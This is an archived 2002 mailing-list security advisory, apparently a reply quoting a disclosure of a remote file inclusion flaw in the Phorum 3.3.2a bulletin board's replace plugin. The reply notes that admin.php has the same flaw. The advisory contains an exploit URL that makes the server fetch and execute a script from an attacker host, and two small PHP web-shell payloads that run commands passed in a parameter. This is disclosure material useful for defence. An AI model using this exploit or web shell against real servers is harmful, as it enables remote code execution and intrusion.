Markus Arndt wrote: > Target: > Phorum 3.3.2a (prior versions?) > > Description: > In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users > include external php scripts and execute arbitary code. > > Found by: > Markus Arndt<markus-arndtat_private> > > Vendor: > http://www.phorum.org > > Notified Vendor: > Yes, already fixed version available > > Details: > > After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders. > I just snooped around a bit and found this file vulnerable for remote script inclusion: > > ./plugin/replace/plugin.php > > let's see some code: > > <?php > include("$PHORUM[settings_dir]/replace.php"); > > function mod_replace_read_body ($body) { > global $pluginreplace; > reset($pluginreplace); > while(list($key,$val) = each($pluginreplace)) { > $body = str_replace($key,$val,$body); > } > return $body; > } > > $plugins["read_body"]["mod_replace"]="mod_replace_read_body"; > > ?> > > Easy one.. > > http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls > > This one will get the file http://[evilhost]/replace.php and execute it. > If [evilhost] has php enabled we could use this one as replace.php: > > <? > echo("<? > system(\"\$cmd\"); > ?>"); > ?> > > If it's not php-enabled simply: > <? > system("$cmd"); > ?> > > Markus Arndt<markus-arndtat_private> > http://skka.de > ________________________________________________________________ > Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! > Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13 Also admin.php is explotable ;) forum/plugin/replace/admin.php: include("$PHORUM[settings_dir]/replace.php");
This archive was generated by hypermail 2b30 : Sat May 18 2002 - 14:54:35 PDT